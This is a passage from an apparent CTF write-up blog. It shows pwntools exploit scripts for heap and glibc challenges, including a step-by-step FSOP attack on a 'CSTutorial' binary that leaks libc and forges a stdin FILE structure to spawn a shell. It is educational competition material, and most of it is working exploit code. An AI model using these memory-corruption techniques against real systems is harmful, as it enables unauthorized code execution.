</span></span><span class=line><span class=cl><span class=n>delete</span><span class=p>(</span><span class=mi>0</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x60</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;C&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1>#p64(e.got.free ^ ((heap_leak+0x2a0) &gt;&gt; 12)))</span>
</span></span><span class=line><span class=cl><span class=c1># update(123, b&#34;A&#34;*8)</span>
</span></span><span class=line><span class=cl><span class=s2>&#34;&#34;&#34;
</span></span></span><span class=line><span class=cl><span class=s2>0x7f06e8239f00 &lt;initial&gt;:       0x0000000000000a41      0x000000000000000c
</span></span></span><span class=line><span class=cl><span class=s2>0x7f06e8239f10 &lt;initial+16&gt;:    0x0000000000000004      0x4d206e7c920b68a1
</span></span></span><span class=line><span class=cl><span class=s2>&#34;&#34;&#34;</span>
</span></span><span class=line><span class=cl><span class=n>update</span><span class=p>(</span><span class=mi>123</span><span class=p>,</span> <span class=n>p64</span><span class=p>(</span><span class=n>exit_funcs</span> <span class=o>^</span> <span class=p>((</span><span class=n>heap_leak</span><span class=o>+</span><span class=mh>0x160</span><span class=p>)</span> <span class=o>&gt;&gt;</span> <span class=mi>12</span><span class=p>)))</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x60</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>create</span><span class=p>(</span><span class=mh>0x60</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x00</span><span class=s2>&#34;</span><span class=o>*</span><span class=mi>8</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=mh>0xc</span><span class=p>)</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=mi>4</span><span class=p>)</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=n>rol</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>system</span> <span class=o>^</span> <span class=n>xor_key</span><span class=p>,</span> <span class=mh>0x11</span><span class=p>,</span> <span class=mi>64</span><span class=p>))</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=nb>next</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>search</span><span class=p>(</span><span class=sa>b</span><span class=s1>&#39;/bin/sh&#39;</span><span class=p>))))</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;E&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1># gdb.attach(p)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>
</span></span></code></pre></div><h2 id=cstutorial>CSTutorial</h2><p>CSTutorial featured 3 very powerful vulnerabilities.</p><ol><li>scanf allows us to have a buffer overflow in BSS</li><li>OOB array indexing on memcpy</li><li>integer overflow on calloc to bypass upper bounds</li></ol><p>This led me to be very confused on where to start attacking.</p><p>Ultimately, I found the most straightforward way for me</p><ol><li>Leak LIBC by allocating huge MMAPed chunk using vulnerability 3</li><li>If we set index of buffer to 1 initially, we will write out of bounds at -1. This allows us to have a powerful overflow using vulnerability 1, and overwrite the pointer of all the buffers as well as the file pointer</li><li>Overwrite all pointers with stdin, and remember not to destroy stdout pointer.</li><li>Before program exits, it calls fread(stdin, buffer_size, 1, stdin)</li><li>Overwrite stdin file structure to call system("/bin/sh") on exiting the program using FSOP</li></ol><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>binary</span> <span class=o>=</span> <span class=n>libc</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;/lib/x86_64-linux-gnu/libc.so.6&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1># p = process(&#34;./chall&#34;)</span>
</span></span><span class=line><span class=cl><span class=n>p</span> <span class=o>=</span> <span class=n>remote</span><span class=p>(</span><span class=s2>&#34;win.the.seetf.sg&#34;</span><span class=p>,</span> <span class=mi>2003</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;allocate?</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;-4000000000&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;(1-3)</span><span class=se>\n</span><span class=s2>&#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;1&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;chunk @ &#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>leak</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>p</span><span class=o>.</span><span class=n>recvline</span><span class=p>()</span><span class=o>.</span><span class=n>strip</span><span class=p>(),</span> <span class=mi>16</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>=</span> <span class=n>leak</span> <span class=o>+</span> <span class=mi>294981616</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;leak @ </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>leak</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;libc base @ </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>address</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;Content: &#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;just for lols&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1># gdb.attach(p)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;Content: &#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=o>*</span><span class=mi>8</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>_IO_2_1_stdin_</span><span class=o>-</span><span class=mi>1</span><span class=p>)</span><span class=o>*</span><span class=mi>3</span> <span class=o>+</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=o>*</span><span class=mi>24</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>_IO_2_1_stdout_</span><span class=p>)</span> <span class=o>+</span> <span class=sa>b</span><span class=s2>&#34;B&#34;</span><span class=o>*</span><span class=mh>0x318</span> <span class=o>+</span> <span class=n>p64</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>_IO_2_1_stdin_</span><span class=p>))</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>standard_FILE_addr</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>_IO_2_1_stdin_</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>fs</span> <span class=o>=</span> <span class=n>FileStructure</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>flags</span> <span class=o>=</span> <span class=n>unpack</span><span class=p>(</span><span class=s2>&#34;  &#34;</span> <span class=o>+</span> <span class=s2>&#34;sh&#34;</span><span class=o>.</span><span class=n>ljust</span><span class=p>(</span><span class=mi>6</span><span class=p>,</span> <span class=s2>&#34;</span><span class=se>\x00</span><span class=s2>&#34;</span><span class=p>),</span> <span class=mi>64</span><span class=p>)</span>  <span class=c1># &#34;  sh&#34;</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>_IO_write_base</span> <span class=o>=</span> <span class=mi>0</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>_IO_write_ptr</span> <span class=o>=</span> <span class=mi>1</span>
</span></span><span class=line><span class=cl><span class=c1># fs._mode = 0</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>_lock</span> <span class=o>=</span> <span class=n>standard_FILE_addr</span><span class=o>-</span><span class=mh>0x10</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>chain</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>system</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>_codecvt</span> <span class=o>=</span> <span class=n>standard_FILE_addr</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>_wide_data</span> <span class=o>=</span> <span class=n>standard_FILE_addr</span> <span class=o>-</span> <span class=mh>0x48</span>
</span></span><span class=line><span class=cl><span class=n>fs</span><span class=o>.</span><span class=n>vtable</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>_IO_wfile_jumps</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>send</span><span class=p>(</span><span class=nb>bytes</span><span class=p>(</span><span class=n>fs</span><span class=p>))</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=o>*</span><span class=mh>0x100</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span><span class=err>```</span>
</span></span></code></pre></div></div></article><hr style=margin-top:40px;margin-bottom:40px><div id=disqus_thread></div><script>window.disqus_config=function(){},function(){if(["localhost","127.0.0.1"].indexOf(window.location.hostname)!=-1){document.getElementById("disqus_thread").innerHTML="Disqus comments not available by default when the website is previewed locally.";return}var t=document,e=t.createElement("script");e.async=!0,e.src="//caprinux.disqus.com/embed.js",e.setAttribute("data-timestamp",+new Date),(t.head||t.body).appendChild(e)}()</script><noscript>Please enable JavaScript to view the <a href=https://disqus.com/?ref_noscript>comments powered by Disqus.</a></noscript><a href=https://disqus.com class=dsq-brlink>comments powered by <span class=logo-disqus>Disqus</span></a></main></div><footer class=footer><span class=footer_item></span>&nbsp;<div class=footer_social-icons><a href=https://github.com/caprinux target=_blank rel="noopener noreferrer me" title=Github><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37.0 00-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44.0 0020 4.77 5.07 5.07.0 0019.91 1S18.73.65 16 2.48a13.38 13.38.0 00-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07.0 005 4.77 5.44 5.44.0 003.5 8.55c0 5.42 3.3 6.61 6.44 7A3.37 3.37.0 009 18.13V22"/></svg>
</a><a href=https://x.com/elma_ios target=_blank rel="noopener noreferrer me" title=Twitter><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M23 3a10.9 10.9.0 01-3.14 1.53 4.48 4.48.0 00-7.86 3v1A10.66 10.66.0 013 4s-4 9 5 13a11.64 11.64.0 01-7 2c9 5 20 0 20-11.5a4.5 4.5.0 00-.08-.83A7.72 7.72.0 0023 3z"/></svg>
</a><a href=index.xml target=_blank rel="noopener noreferrer me" title=Rss><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M4 11a9 9 0 019 9"/><path d="M4 4a16 16 0 0116 16"/><circle cx="5" cy="19" r="1"/></svg></a></div><small class=footer_copyright>© 2024 elma.
Powered by <a href=https://github.com/hugo-sid/hugo-blog-awesome target=_blank rel=noopener>Hugo blog awesome</a>.</small></footer><a href=# title="Go to top" id=totop><svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentcolor" stroke="currentcolor" viewBox="0 96 960 960"><path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197z"/></svg>
</a><script src=https://archive.elmo.sg/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30+lSNuSkl4QXuNyy8="></script></body></html>